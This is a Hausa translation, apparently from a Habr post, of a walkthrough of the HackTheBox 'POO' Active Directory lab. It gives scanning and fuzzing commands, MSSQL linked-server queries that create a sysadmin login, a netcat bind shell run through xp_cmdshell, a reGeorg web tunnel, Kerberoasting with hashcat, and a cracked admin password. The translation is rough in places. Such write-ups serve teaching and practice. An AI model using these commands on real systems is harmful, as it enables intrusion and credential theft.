A cikin wannan labarin, za mu bincika nassi na ba kawai na'ura ba, amma dukan karamin dakin gwaje-gwaje daga shafin .
Kamar yadda aka bayyana a cikin bayanin, POO an tsara shi don gwada ƙwarewa a kowane mataki na hare-hare a cikin ƙaramin mahalli na Active Directory. Manufar ita ce a ɓata mai masaukin baki, haɓaka gata, kuma a ƙarshe ɓata duk yankin yayin tattara tutoci 5.
Haɗin kai zuwa dakin gwaje-gwaje ta hanyar VPN. Ana ba da shawarar cewa kada ku haɗa ta kwamfutar da ke aiki ko daga mai watsa shiri inda akwai mahimman bayanai a gare ku, yayin da kuke shiga hanyar sadarwa mai zaman kansa tare da mutanen da suka san wani abu game da tsaro na bayanai 🙂
bayanin kungiya
Domin ku sami sabbin labarai, software da sauran bayanai, na ƙirƙira и a cikin IIKB. Hakanan buƙatunku na sirri, tambayoyi, shawarwari da shawarwari .
An bayar da duk bayanan don dalilai na ilimi kawai. Marubucin wannan takarda ba shi da alhakin duk wani lahani da aka yi wa kowa sakamakon amfani da ilimi da hanyoyin da aka samu a sakamakon nazarin wannan takarda.
intro
Wannan wasan ƙarshe ya ƙunshi inji guda biyu, kuma ya ƙunshi tutoci 5.
Hakanan an bayar da bayanin da adireshin mai masaukin baki.
Bari mu fara!
Sake tuta
Wannan injin yana da adireshin IP na 10.13.38.11 wanda na ƙara zuwa /etc/hosts.
10.13.38.11 poo.htb
Mataki na farko shine duba wuraren da aka buɗe. Tunda yana ɗaukar lokaci mai tsawo don bincika duk tashar jiragen ruwa tare da nmap, zan fara yi da masscan. Muna bincika duk tashoshin TCP da UDP daga tun0 interface a 500pps.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Yanzu, don samun ƙarin cikakkun bayanai game da ayyukan da ke gudana akan tashoshin jiragen ruwa, bari mu gudanar da bincike tare da zaɓi -A.
nmap -A poo.htb -p80,1433
Don haka muna da sabis na IIS da MSSQL. A wannan yanayin, za mu gano ainihin sunan DNS na yanki da kwamfuta. A kan sabar gidan yanar gizo ana gaishe mu da shafin gida na IIS.
Bari mu shiga cikin kundin adireshi. Ina amfani da gobuster don wannan. A cikin sigogi muna nuna adadin zaren 128 (-t), URL (-u), ƙamus (-w) da kari waɗanda ke ba mu sha'awar (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
Wannan yana ba mu tabbacin HTTP don jagorar mai gudanarwa, da kuma fayil ɗin .DS_Store na sabis na tebur. .DS_Store fayiloli ne da ke adana saitunan al'ada don babban fayil, kamar jerin fayiloli, wuraren gumaka, da hoton bangon da aka zaɓa. Irin wannan fayil ɗin na iya ƙarewa a cikin adireshin uwar garken gidan yanar gizo na masu haɓaka gidan yanar gizo. Ta wannan hanyar muna samun bayanai game da abubuwan da ke cikin kundin adireshi. Don wannan zaka iya amfani .
python3 dsstore_crawler.py -i http://poo.htb/
Muna samun abubuwan da ke cikin kundin adireshi. Abu mafi ban sha'awa anan shine directory / dev, wanda daga ciki zamu iya ganin tushe da fayilolin db a cikin rassa biyu. Amma zamu iya amfani da haruffa 6 na farko na fayil da sunayen adireshi idan sabis ɗin yana da rauni ga IIS ShortName. Kuna iya bincika wannan rashin lafiyar ta amfani da .
Kuma mun sami fayil ɗin rubutu guda ɗaya wanda ya fara da "poo_co". Ban san abin da zan yi na gaba ba, kawai na zaɓi daga ƙamus na kundayen adireshi duk kalmomin da suka fara da "co".
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txtKuma maimaita tare da wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
Kuma sami kalmar da ta dace! Muna duban wannan fayil ɗin, ajiye takaddun shaida (lala'akari da sigar DBNAME, daga MSSQL suke).
Mun mika tutar kuma mun ci gaba da kashi 20%.
Huh tuta
Muna haɗi zuwa MSSQL, Ina amfani da DBeaver.
Ba mu sami wani abu mai ban sha'awa a cikin wannan bayanan ba, bari mu ƙirƙiri Editan SQL kuma mu bincika menene masu amfani.
SELECT name FROM master..syslogins;
Muna da masu amfani guda biyu. Mu duba gatan mu.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
Don haka, babu gata. Bari mu kalli sabobin da aka haɗa, na rubuta game da wannan fasaha daki-daki .
SELECT * FROM master..sysservers;
Don haka mun sami wani SQL Server. Bari mu duba aiwatar da umarni akan wannan uwar garken ta amfani da buɗaɗɗen tambaya().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
Kuma muna iya gina bishiyar tambaya.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');Gaskiyar ita ce, lokacin da muka yi buƙatu zuwa uwar garken da aka haɗa, ana aiwatar da buƙatar a cikin mahallin wani mai amfani! Bari mu ga abin da mahallin mai amfani ke gudana akan uwar garken da aka haɗa.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
Yanzu bari mu ga a cikin wane yanayi ake buƙatar buƙata daga uwar garken da aka haɗa zuwa namu!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
Don haka, mahallin DBO ne wanda dole ne ya sami dukkan gata. Mu duba gata idan akwai buƙata daga uwar garken da aka haɗa.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
Kamar yadda kuke gani, muna da dukkan gata! Mu kirkiro admin kamar haka. Amma ba sa barin su ta hanyar buɗaɗɗen tambaya, bari mu yi ta EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";Kuma yanzu mun haɗa tare da takaddun shaidar sabon mai amfani, muna kiyaye sabon bayanan tuta.
Mu mika wannan tuta mu ci gaba.
Tutar BackTrack
Bari mu sami harsashi ta amfani da MSSQL, Ina amfani da mssqlclient daga fakitin impacket.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
Muna buƙatar samun kalmomin shiga, kuma abu na farko da muka riga muka haɗu shine shafin. Don haka, muna buƙatar saitin uwar garken gidan yanar gizo (ba shi yiwuwa a jefa harsashi mai dacewa, da alama tacewar wuta yana aiki).
Amma an hana shiga. Ko da yake muna iya karanta fayil ɗin daga MSSQL, muna buƙatar kawai sanin waɗanne harsunan shirye-shirye ake daidaita su. Kuma a cikin MSSQL directory mun gano cewa akwai Python.
Sannan babu matsala don karanta fayil ɗin web.config.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
Tare da bayanan da aka samo, je zuwa / admin kuma ɗauki tuta.
Tutar kafa
A gaskiya ma, akwai wasu rashin jin daɗi daga amfani da Tacewar zaɓi, amma duba ta hanyar saitunan cibiyar sadarwa, mun lura cewa ana amfani da yarjejeniya ta IPv6!
Ƙara wannan adireshin zuwa /etc/hosts.
dead:babe::1001 poo6.htb
Bari mu sake duba mai watsa shiri, amma wannan lokacin sama da IPv6.
Kuma sabis ɗin WinRM yana samuwa akan IPv6. Bari mu haɗa tare da abubuwan da aka samo.
Akwai tuta a kan tebur, mun mika shi.
Tutar P00
Bayan gudanar da bincike a kan rundunar ta amfani da Ba mu sami wani abu na musamman ba. Sa'an nan aka yanke shawarar sake neman takaddun shaida (Ni ma na rubuta akan wannan batu ). Amma ba zan iya samun duk SPNs daga tsarin ta WinRM ba.
setspn.exe -T intranet.poo -Q */*
Bari mu aiwatar da umarnin ta hanyar MSSQL.
Ta wannan hanyar, muna samun SPN na masu amfani p00_hr da p00_adm, wanda ke nufin cewa suna da rauni ga hari kamar Kerberoasting. A takaice, za mu iya samun hashes na kalmomin shiga.
Da farko kuna buƙatar samun tsayayyen harsashi a madadin mai amfani da MSSQL. Amma tunda muna da iyaka a cikin damar shiga, muna da haɗin gwiwa tare da mai watsa shiri kawai ta tashar jiragen ruwa 80 da 1433. Amma yana yiwuwa a yi rami ta hanyar tashar jiragen ruwa 80! Don wannan muna amfani . Bari mu loda fayil ɗin tunnel.aspx zuwa gidan adireshin gidan sabar gidan yanar gizo - C:inetpubwwwroot.
Amma lokacin da muka yi ƙoƙarin samun dama gare shi, muna samun kuskuren 404. Wannan yana nufin cewa * .aspx fayiloli ba a kashe su. Domin aiwatar da fayiloli tare da waɗannan kari, shigar da ASP.NET 4.5 kamar haka.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
Kuma yanzu, lokacin da muka isa tunnel.aspx, muna samun amsa cewa komai yana shirye don tafiya.
Bari mu fara ɓangaren abokin ciniki na aikace-aikacen, wanda zai sadar da zirga-zirga. Za mu tura duk zirga-zirga daga tashar jiragen ruwa 5432 zuwa uwar garken.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
Kuma muna amfani da proxychains don aika zirga-zirgar kowane aikace-aikacen ta hanyar wakili. Bari mu ƙara wannan wakili zuwa fayil ɗin sanyi /etc/proxychains.conf.
Yanzu bari mu loda shirin zuwa uwar garken , wanda da shi za mu yi barga daure harsashi, da kuma rubutun , wanda da shi za mu yi harin Kerberoasting.
Yanzu, ta hanyar MSSQL, mun ƙaddamar da mai sauraro.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
Kuma muna haɗi ta hanyar wakili.
proxychains rlwrap nc poo.htb 4321
Kuma bari mu sami hashes.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Na gaba, kuna buƙatar sake maimaita waɗannan hashes. Tun da rockyou ba shi da ƙamus na bayanan kalmar sirri, na yi amfani da DUKAN ƙamus na kalmar sirri da aka bayar a cikin Seclists. Don ƙididdigewa muna amfani da hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --forceKuma mun sami kalmomin shiga guda biyu, na farko a cikin ƙamus dutch_passwordlist.txt, na biyu kuma a cikin Keyboard-Combinations.txt.
Don haka muna da masu amfani guda uku, bari mu je wurin mai sarrafa yanki. Da farko za mu gano adireshinsa.
Mai girma, mun koyi adireshin IP na mai sarrafa yanki. Bari mu gano duk masu amfani da yankin, da kuma wanene cikinsu mai gudanarwa. Don zazzage rubutun don samun bayani PowerView.ps1. Sa'an nan kuma za mu haɗa ta amfani da mugunta-winrm, ƙayyade directory tare da rubutun a cikin -s parameter. Sannan kawai loda rubutun PowerView.
Yanzu muna da damar yin amfani da duk ayyukansa. Mai amfani da p00_adm yayi kama da mai gata, don haka za mu yi aiki a cikin mahallinsa. Bari mu ƙirƙiri wani abu na PSCRidential don wannan mai amfani.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$CpassYanzu duk umarnin Powershell inda muka saka Creds za a aiwatar da su azaman p00_adm. Bari mu nuna jerin masu amfani da sifa ta AdminCount.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
Don haka, mai amfani da mu yana da gata da gaske. Bari mu ga a wane rukuni yake.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
A ƙarshe mun tabbatar da cewa mai amfani shine mai gudanar da yanki. Wannan yana ba shi 'yancin shiga cikin mai sarrafa yanki daga nesa. Bari mu gwada shiga ta WinRM ta amfani da ramin mu. Na rikice da kurakuran da reGeorg ya samar lokacin amfani da mugunta-winrm.
Sannan mu yi amfani da wani, mai sauki, don haɗi zuwa WinRM. Buɗe kuma canza sigogin haɗi.
Muna ƙoƙarin haɗi, kuma muna cikin tsarin.
Amma babu tuta. Sannan duba mai amfani kuma duba kwamfutocin.
A mr3ks mun sami tutar kuma an kammala dakin gwaje-gwaje 100%.
Shi ke nan. A matsayin martani, da fatan za a yi sharhi ko kun koyi wani sabon abu daga wannan labarin kuma ko yana da amfani a gare ku.
Za ku iya shiga mu a . A can za ku iya samun abubuwa masu ban sha'awa, darussan leaked, da kuma software. Mu tara al’umma a cikinta za a samu mutanen da za su fahimci fagage da dama na IT, sannan a ko da yaushe za mu iya taimakon juna kan duk wani lamari na IT da tsaro na bayanai.
source: www.habr.com